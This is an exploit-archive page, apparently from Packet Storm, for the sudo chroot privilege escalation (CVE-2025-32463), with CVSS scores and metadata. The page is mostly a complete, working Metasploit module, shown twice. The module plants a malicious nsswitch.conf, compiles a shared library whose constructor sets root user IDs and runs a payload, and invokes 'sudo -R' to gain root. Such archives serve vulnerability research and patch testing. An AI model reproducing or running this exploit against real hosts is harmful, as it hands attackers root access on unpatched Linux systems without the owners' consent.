📄 Sudo Chroot 1.9.17 Privilege Escalation_PACKETSTORM:209192

9.3 / 10

CRITICAL

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

This Metasploit module exploits the chroot vulnerability...

Visit Original Source

Basic Information

ID PACKETSTORM:209192

Published Sep 4, 2025 at 00:00

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking

include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::Linux::Compile
include Msf::Post::Linux::Packages
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',
'Description' => %q{
Sudo before version 1.19.17p1 allows user to use `chroot` option, when
executing command. The option is intended to run a command with
user-selected root directory (if sudoers file allow it). Change in version
1.9.14 allows resolving paths via `chroot` using user-specified root
directory when sudoers is still evaluating.
This allows the attacker to trick Sudo into loading arbitrary shared object,
thus resulting in a privilege escalation.
},
'License' => MSF_LICENSE,

'Author' => [
'msutovsky-r7', # module dev
'Stratascale', # poc dev
'Rich Mirch' # security research
],
'Platform' => [ 'linux' ],

'Arch' => [ ARCH_CMD ],

'SessionTypes' => [ 'shell', 'meterpreter' ],

'Targets' => [[ 'Auto', {} ]],

'Privileged' => true,

'References' => [
[ 'EDB', '52352' ],
[ 'URL', 'https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/'],
[ 'CVE', '2025-32463']
],
'DisclosureDate' => '2025-06-30',

'DefaultTarget' => 0,

'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
}
)
)

# force exploit is used to bypass the check command results
register_advanced_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
]
end

# borrowed from exploits/linux/local/sudo_baron_samedit.rb
def get_version
versions = {}
output = cmd_exec('sudo --version')
if output
version = output.split("\n").first.split(' ').last
versions[:sudo] = version if version =~ /^\d/
end
versions[:sudo].gsub(/p/, '.')
end

def check
sudo_version = installed_package_version('sudo') || get_version

return CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.blank?

return CheckCode::Safe if !file?('/etc/nsswitch.conf')

return CheckCode::Appears("Running version #{sudo_version}") if Rex::Version.new(sudo_version).between?(Rex::Version.new('1.9.14'), Rex::Version.new('1.9.17'))

CheckCode::Safe("Sudo #{sudo_version} is not vulnerable")
end

def exploit
# Check if we're already root
if !datastore['ForceExploit'] && is_root?
fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
end

# needs to compile in real-time to adjust payload execution path
fail_with Failure::NotFound, 'Module needs to compile payload on target machine' unless live_compile?

payload_file = rand_text_alphanumeric(5..10)

existing_shell = cmd_exec('echo $0 || echo ${SHELL}')

return Failure::NotFound, 'Could not find shell' unless file?(existing_shell)

upload_and_chmodx("#{datastore['WritableDir']}/#{payload_file}", "#!#{existing_shell}\n#{payload.encoded}")

register_files_for_cleanup("#{datastore['WritableDir']}/#{payload_file}")

temp_dir = "#{datastore['WritableDir']}/#{rand_text_alphanumeric(5..10)}"

base_dir = rand_text_alphanumeric(5..10)

lib_filename = rand_text_alphanumeric(5..10)

mkdir(temp_dir)

cd(temp_dir)

mkdir(base_dir.to_s)

mkdir("#{base_dir}/etc")

mkdir('libnss_')

return Failure::PayloadFailed, 'Failed to create malicious nsswitch.conf file' unless write_file("#{base_dir}/etc/nsswitch.conf", "passwd: /#{lib_filename}\n")

return Failure::PayloadFailed, 'Failed to copy /etc/group' unless copy_file('/etc/group', "#{base_dir}/etc/group")

exploit_code = %<
#include <unistd.h>

__attribute__((constructor))
void exploit(void) {
setreuid(0,0);
execve("#{datastore['WritableDir']}/#{payload_file}",NULL,NULL);

}>

upload_and_compile("#{temp_dir}/libnss_/#{lib_filename}.so.2", exploit_code, "-shared -fPIC -Wl,-init,#{base_dir}")

cmd_exec("sudo -R #{base_dir} #{base_dir}")

timeout = 30
print_status 'Launching exploit...'
output = cmd_exec 'command', nil, timeout
output.each_line { |line| vprint_status line.chomp }
end
end

{
    "lastseen": "2025-09-04T15:23:00",
    "description": "This Metasploit module exploits the chroot vulnerability...",
    "published": "2025-09-04T00:00:00",
    "modified": "2025-09-04T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Sudo Chroot 1.9.17 Privilege Escalation",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:209192",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-32462",
        "CVE-2025-32463"
    ],
    "sourceData": "##\n    # This module requires Metasploit: https://metasploit.com/download\n    # Current source: https://github.com/rapid7/metasploit-framework\n    ##\n    \n    class MetasploitModule < Msf::Exploit::Local\n      Rank = NormalRanking\n    \n      include Msf::Post::Linux::Priv\n      include Msf::Post::Linux::System\n      include Msf::Post::Linux::Compile\n      include Msf::Post::Linux::Packages\n      include Msf::Exploit::EXE\n      include Msf::Exploit::FileDropper\n    \n      prepend Msf::Exploit::Remote::AutoCheck\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',\n            'Description' => %q{\n              Sudo before version 1.19.17p1 allows user to use `chroot` option, when\n              executing command. The option is intended to run a command with\n              user-selected root directory (if sudoers file allow it). Change in version\n              1.9.14 allows resolving paths via `chroot` using user-specified root\n              directory when sudoers is still evaluating.\n              This allows the attacker to trick Sudo into loading arbitrary shared object,\n              thus resulting in a privilege escalation.\n            },\n            'License' => MSF_LICENSE,\n    \n            'Author' => [\n              'msutovsky-r7', # module dev\n              'Stratascale', # poc dev\n              'Rich Mirch' # security research\n            ],\n            'Platform' => [ 'linux' ],\n    \n            'Arch' => [ ARCH_CMD ],\n    \n            'SessionTypes' => [ 'shell', 'meterpreter' ],\n    \n            'Targets' => [[ 'Auto', {} ]],\n    \n            'Privileged' => true,\n    \n            'References' => [\n              [ 'EDB', '52352' ],\n              [ 'URL', 'https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/'],\n              [ 'CVE', '2025-32463']\n            ],\n            'DisclosureDate' => '2025-06-30',\n    \n            'DefaultTarget' => 0,\n    \n            'Notes' => {\n              'Stability' => [CRASH_SAFE],\n              'Reliability' => [REPEATABLE_SESSION],\n              'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n            }\n          )\n        )\n    \n        # force exploit is used to bypass the check command results\n        register_advanced_options [\n          OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\n        ]\n      end\n    \n      # borrowed from exploits/linux/local/sudo_baron_samedit.rb\n      def get_version\n        versions = {}\n        output = cmd_exec('sudo --version')\n        if output\n          version = output.split(\"\\n\").first.split(' ').last\n          versions[:sudo] = version if version =~ /^\\d/\n        end\n        versions[:sudo].gsub(/p/, '.')\n      end\n    \n      def check\n        sudo_version = installed_package_version('sudo') || get_version\n    \n        return CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.blank?\n    \n        return CheckCode::Safe if !file?('/etc/nsswitch.conf')\n    \n        return CheckCode::Appears(\"Running version #{sudo_version}\") if Rex::Version.new(sudo_version).between?(Rex::Version.new('1.9.14'), Rex::Version.new('1.9.17'))\n    \n        CheckCode::Safe(\"Sudo #{sudo_version} is not vulnerable\")\n      end\n    \n      def exploit\n        # Check if we're already root\n        if !datastore['ForceExploit'] && is_root?\n          fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'\n        end\n    \n        # needs to compile in real-time to adjust payload execution path\n        fail_with Failure::NotFound, 'Module needs to compile payload on target machine' unless live_compile?\n    \n        payload_file = rand_text_alphanumeric(5..10)\n    \n        existing_shell = cmd_exec('echo $0 || echo ${SHELL}')\n    \n        return Failure::NotFound, 'Could not find shell' unless file?(existing_shell)\n    \n        upload_and_chmodx(\"#{datastore['WritableDir']}/#{payload_file}\", \"#!#{existing_shell}\\n#{payload.encoded}\")\n    \n        register_files_for_cleanup(\"#{datastore['WritableDir']}/#{payload_file}\")\n    \n        temp_dir = \"#{datastore['WritableDir']}/#{rand_text_alphanumeric(5..10)}\"\n    \n        base_dir = rand_text_alphanumeric(5..10)\n    \n        lib_filename = rand_text_alphanumeric(5..10)\n    \n        mkdir(temp_dir)\n    \n        cd(temp_dir)\n    \n        mkdir(base_dir.to_s)\n    \n        mkdir(\"#{base_dir}/etc\")\n    \n        mkdir('libnss_')\n    \n        return Failure::PayloadFailed, 'Failed to create malicious nsswitch.conf file' unless write_file(\"#{base_dir}/etc/nsswitch.conf\", \"passwd: /#{lib_filename}\\n\")\n    \n        return Failure::PayloadFailed, 'Failed to copy /etc/group' unless copy_file('/etc/group', \"#{base_dir}/etc/group\")\n    \n        exploit_code = %<\n        #include <unistd.h>\n    \n        __attribute__((constructor))\n        void exploit(void) {\n          setreuid(0,0);\n          execve(\"#{datastore['WritableDir']}/#{payload_file}\",NULL,NULL);\n    \n        }>\n    \n        upload_and_compile(\"#{temp_dir}/libnss_/#{lib_filename}.so.2\", exploit_code, \"-shared -fPIC -Wl,-init,#{base_dir}\")\n    \n        cmd_exec(\"sudo -R #{base_dir} #{base_dir}\")\n    \n        timeout = 30\n        print_status 'Launching exploit...'\n        output = cmd_exec 'command', nil, timeout\n        output.each_line { |line| vprint_status line.chomp }\n      end\n    end",
    "sourceHref": "https://packetstorm.news/download/209192",
    "cvss": {
        "score": 9.3,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/209192/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply